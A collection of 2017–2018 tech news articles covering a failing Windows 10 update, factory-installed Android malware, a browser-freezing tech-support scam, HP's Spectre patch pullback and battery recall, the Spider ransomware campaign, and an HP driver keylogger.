Skip to content

Windows 10 Cumulative Update KB4090913 Fails to Install, Causes Other Issues

March 7, 2018

This update is only shipped to Fall Creators Update machines

Microsoft rolled out Windows 10 cumulative update KB4090913 for systems running Fall Creators Update (version 1709) yesterday to fix a USB device connectivity problem, but as it turns out, the same update also causes some more issues on a number of machines.

At this point, there are isolated reports of failed installs hitting Windows 10 cumulative update KB4090913, and just like it happened with previous CUs, users are complaining of an error reading “We could not complete the update, reverting changes” with code 0x80070643.

Afterward, systems are automatically re-offered the update with another failed install attempt, so they’re pushed into an infinite loop that doesn’t stop until the patch itself is completely hidden and blocked on Windows 10.

Can’t find the cause and now stuck on windows update downloading the update again and if I restart to try and install it it’s the same on repeat. fails to install and reverting back,” one user explained on reddit.

Some suggest there’s an issue with AMD processors running the latest versions of Windows 10, though Microsoft doesn’t specifically list any known issues with such hardware.

New cumulative updates coming next week

In addition to the typical failed installs hitting cumulative updates, KB4090913 also causes other problems, including USB devices no longer working correctly after the install.

Careful guys it broke my mouse Logitech G502 until i uninstalled the update.
More or less made everything on my desktop unclickable
,” one user explained, while another one confirmed the bug with the same mouse, adding that they occasionally get a BSOD.

While originally Microsoft said cumulative update KB4090913 only fixes an issue with USB devices, the changelog has been quietly updated in the meantime to also reveal that it resolves a bug causing some devices to fail to boot with INACCESSIBLE BOOT_DEVICE error.

At the time of writing this article, there are no new known issues added to the KB page.
With Patch Tuesday kicking off next week and more cumulative update likely to be released, expect fixes aimed at today’s bugs to be included in the rollout.



Android Phones Caught Selling with Pre-Installed Factory Malware

March 5, 2018

Malware injected in firmware of more than 40 models

More than 40 Android phone models, most of them manufactured by companies in China, ship with pre-installed malware that was injected into the firmware straight from the factory.

Security company Dr Web says that it came across a new Trojan called Android.Triada.231 in the firmware of several Android devices back in mid-2017, and after an in-depth research, it discovered that over 40 models are likely to be affected.

Most of the compromised phones are in the low-end category, and they include devices from Leagoo, Doogee, Umi, and Cubot.
Newer models include the Leagoo M9 launched in December.

Dr. Web explains that it contacted the affected companies to report the problem, and it discovered that at least in one case, the culprit was a partnership with a software developing company in Shanghai which required Android OEMs to pre-install one of its apps into the image of the mobile operating system.

Stealing confidential information

As for how dangerous the malware can be for Android users purchasing these phones, the security firm says it can steal confidential information, like banking data and personal details.

These Trojans infect the process of an important Android system component, Zygote. This process is used to launch all applications.
Once the Trojans inject into this module, they penetrate other running applications
,” Dr. Web explains in its analysis.

In doing so, they obtain the ability to carry out various malicious activities without a user’s intervention: they covertly download and launch software.
The key feature of Android.Triada.231 is that cybercriminals inject this Trojan into the system library.
They do not distribute the Trojan as a separate program.
As a result, the malicious application penetrates the device firmware during manufacture.
Users receive their devices already infected from the box

The security company warns that the number of Android phones possibly shipping with the same malware could be bigger, though for the time being, only the models below have been confirmed to be compromised.

Removing the malware from a phone isn’t possible without installing a clean version of the operating system, in which case the manufacturer is the only one that can help.
If the device is rooted, security applications can help clean the infection.

Leagoo M5
Leagoo M5 Plus
Leagoo M5 Edge
Leagoo M8
Leagoo M8 Pro
Leagoo Z5C
Leagoo T1 Plus
Leagoo Z3C
Leagoo Z1C
Leagoo M9
ARK Benefit M8
Zopo Speed 7 Plus
Doogee X5 Max
Doogee X5 Max Pro
Doogee Shoot 1
Doogee Shoot 2
Tecno W2
Homtom HT16
Umi London
Kiano Elegance 5.1
iLife Fivo Lite
Mito A39
Vertex Impress InTouch 4G
Vertex Impress Genius
myPhone Hammer Energy
Advan S5E NXT
Advan S4Z
Advan i5E
Tesla SP6.2
Cubot Rainbow
Haier T51
Cherry Mobile Flare S5
Cherry Mobile Flare J2S
Cherry Mobile Flare P1
Pelitt T1 PLUS
Prestigio Grace M5 LTE
BQ 5510


Windows Chrome users: Tech-support scams try new trick to freeze your browser

February 7, 2018

Get an ad-blocker if you want to dodge tech-support scammers’ latest rapid-download ruse.

Tech-support scammers have developed a new trick to freeze browsers on a bogus security alert with a number to a fake support line.

The ultimate goal of the browser freeze is to cause stress to lots of potential victims in the hope some will call the bogus hotline offered in the alert.

Previously, tech-support scams have used pop-under windows, pop-up loops, and other shady techniques that aim to prevent users from closing the bogus security alert page.
Scammers frequently use malicious ads to nudge browser users to booby-trapped webpages that freeze the browser.

A new technique found by researchers at Malwarebytes targets the current version of Chrome, 64.0.3282.140, on Windows.

This scam works by instructing the browser to rapidly download thousands of files from the web, which quickly results in Chrome becoming unresponsive and makes it impossible to close tabs or the window by clicking the X button.

Malwarebytes’ Jerome Segura said that the booby-trapped pages in this case include code that abuses a web application programming interface for saving files from the web on the browser.

The code is set to download ‘blob’ objects at half-second intervals, leading to a huge number of concurrent downloads that causes the browser to freeze and a large spike in CPU and memory usage.

Segura contends that given most of these browser lockers reach users via malvertizing, one effective method of countering the threat is to use an ad-blocker.

He also notes that people who have landed on one of these pages can escape them by going to the Windows Task Manager and force quitting the offending browser processes.

Chrome is often targeted because of its huge number of users, making it ideal for indiscriminate and widespread attacks that are usually delivered by malicious ads.


HP Pulls Spectre Security Update Due to Intel Bug

January 24, 2018

BIOS updates suspended due to patch issues

Intel has recently confirmed that its Spectre (Variant 2) patch could cause system reboots and other issues on computers installing it, and the company recommended against installing it until a workaround is provided.

As a consequence, other companies that shipped firmware updates including Intel’s patches are now forced to suspend them as well in order to prevent these issues from hitting their devices.

After Dell published an advisory to recommend users to avoid installing the latest BIOS updates and to downgrade to the previous release, HP does the same thing and announces that it pulled the latest patches because of the said issues.

Intel has updated their security advisory recommending to stop deployment of current versions of the MCU patch as they may introduce higher than expected reboots and other unpredictable system behavior,” HP says in an advisory on its website.

Intel says it’s sorry for the millionth time this year

The company goes on to explain that it is removing HP BIOS softpaqs with Intel microcode patches from its download center and will reissue patches that include the previous Intel microcode starting January 25.
HP will wait until Intel publishes new updates and will then reissue the BIOS updates as well, it says.

Intel apologized for the blunder earlier this week, as it acknowledged issues caused by its security updates on Broadwell, Haswell, and even new platforms.
The company says it has already identified the root cause for the bug, and says that it’s currently in the process of developing a solution to address it.

We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior,” Intel says.

Without patches, users are recommended to stay away from unknown sites and content that could try to exploit the Spectre Variant 2 vulnerability.
There are no known attacks at this point, companies say.


HP laptop batteries overheating leads to recall

January 6, 2018

Laptops sold between December 2015 and December 2017 may be powered by a battery that’s prone to overheating or even melting.

If you own a laptop, you already have the Meltdown and Spectre security flaws to worry about. If you own a HP laptop, add another potential woe to your list.

A small number of HP laptops and mobile workstations shipped between December 2015 and December 2017 will need their batteries replaced because they have a
potential to overheat, posing a fire and burn hazard,” the company said Thursday.
These batteries are sealed within the laptop, which means their removal and replacement is not a DIY job.

This action pertains to approximately 0.1 percent of the HP systems sold globally over the past two years,” a HP spokesperson said. “We are taking immediate action to address this issue including a voluntary recall and replacement of the batteries.”

According to the US Consumer Product Safety Commission, the recall affects more than 52,000 laptops and mobile workstations.

HP will send those impacted a free battery replacement, as well as help arrange an appointment to get it replaced.
If you own a HP laptop or workstation, you can check here to see if your unit is affected.
HP released the table below showing which models are prone to the fault.

Issues with battery safety and longevity have long haunted the tech industry.
Among the more recent fiascoes have been Samsung’s overheating phone batteries in 2016 to Apple’s attempts to deal with limping batteries revealed last month.

HP’s recall comes after eight reports of batteries “overheating, melting or charring,” according to the Consumer Product Safety Commission.
One of these incidents led to a first-degree burn on someone’s hand, the commission said, while three caused property damage of up to $4,500.


New Spider ransomware threatens to delete your files if you don’t pay within 96 hours

December 12, 2017

Attackers behind new ransomware campaign are offering a “really easy” tutorial video in order to ensure they make money from their criminal activities.

A new form of ransomware has emerged and is being distributed through malicious Office documents, infecting victims with file-encrypting malware.

Uncovered by researchers at Netskope, the ‘Spider Virus‘ ransomware campaign was first detected on December 10 and is ongoing.

Like many ransomware schemes, the attack begins with malicious emails to potential victims.
The email subjects and the lure documents indicate the attackers are keen on targeting victims in the Balkans.
It’s currently unknown where the attackers are operating from.

The malicious Microsoft Office attachment contains obfuscated macro code which — if macros are enabled — allows a PowerShell to download the first stage of the ransomware payload from a host website.

Following this, the PowerShell script decodes the Base64 string and performs operations to decode the final payloads in an .exe file — which contains the Spider ransomware encryptor.

PowerShell then launches the encryptor, encrypting the user’s files, adding a ‘.spider’ extension to them and then displaying a ransom note.

The note tells the victim they’ve been infected with the Spider Virus and that they need to make a bitcoin payment for “the right key” in order to get their files back.

The attackers also issue a threat that if the payment isn’t received within 96 hours, their files will be deleted permanently.
They add victims shouldn’t “try anything stupid” as the ransomware has “security measures” which delete the files if the victim tries to retrieve them without paying the ransom.

The Spider ransomware note is available in two languages.

An additional note provides the victim with instructions on how to download the Tor browser required to access the payment site, how to generate a decryption tool, and how to purchase bitcoin.

This may seem complicated to you, actually it’s really easy“, the note says — adding that there’s also a video tutorial inside a ‘help section’.
It’s common for ransomware distributors to provide this sort of ‘service’ to victims, because if the victims can’t pay the ransom, the criminals won’t make money from their campaign.

The attackers behind Spider offer a tutorial video to victims to ensure that they can buy bitcoin to pay the ransom.

The Spider ransomware is still being distributed in what researchers refer to as a “mid-scale campaign”.

As well as educating employees about the danger of ransomware and backing up critical files, businesses can protect themselves from becoming infected by Spider — and many other forms of file-encrypting malware — by removing macros, which are used as an attack vector.

In addition to disabling macros by default, users must also be cautious of documents that only contain a message to enable macros to view the contents and also not to execute unsigned macros and macros from untrusted sources,” said Netscope’s Amit Malik.

Because Spider is a brand new form of ransomware, there’s currently no free decryption tool available for victims to retrieve files.


Keylogger uncovered on hundreds of HP PCs

December 11, 2017

For the second time this year, HP has been forced to issue an emergency fix for pre-installed keylogger software.

Hewlett Packard has issued an emergency patch to resolve a driver-level keylogger discovered on hundreds of HP laptops.

The bug was discovered by Michael Myng, also known as “ZwClose.”
The security researcher was exploring the Synaptics Touchpad SynTP.sys keyboard driver and how laptop keyboards were backlit and stumbled across code which looked suspiciously like a keylogger.

In a blog post, ZwClose said the keylogger, which saved scan codes to a WPP trace, was found in the driver.

While logging was disabled by default, given the right permissions, it could be enabled through changing registry values and so should a laptop be compromised by malware, malicious code — including Trojans — could take advantage of the keylogging system to spy on users.

I messaged HP about the finding,” Myng said. “They replied terrifically fast, confirmed the presence of the keylogger (which actually was a debug trace) and released an update that removes the trace.”

HP has acknowledged the issue.
In a security advisory, HP said:

“A potential security vulnerability has been identified with certain versions of Synaptics touchpad drivers that impacts all Synaptics OEM partners.

A party would need administrative privileges in order to take advantage of the vulnerability.
Neither Synaptics nor HP has access to customer data as a result of this issue.”

A CVSS score of 6.1 has been issued, together with updated firmware and drivers for hundreds of laptops, both commercial and consumer.

Affected products include HP G2 Notebooks, the HP Elite x2 1011 G1 tablet, HP EliteBooks, HP ProBooks, and HP ZBook models, among others.

The researcher said that a fix will also be included in Windows Update.

Back in May, security firm Modzero discovered a keylogger in the Conexant HD audio driver package, installed in dozens of HP devices.
HP quickly rolled out a patch which resolved the issue, which could be used to collect data including passwords, website addresses, and private messages.